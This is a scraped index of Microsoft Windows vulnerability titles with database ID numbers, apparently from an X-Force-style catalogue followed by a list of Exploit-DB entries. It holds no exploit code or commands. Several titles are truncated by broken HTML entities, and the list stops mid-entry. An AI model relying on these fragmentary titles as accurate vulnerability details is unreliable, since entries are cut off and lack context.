win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9789] Microsoft Exchange MSRPC denial of service [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6914] Multiple Microsoft products malformed RPC request denial of service [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta Exploit-DB - https://www.exploit-db.com: [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 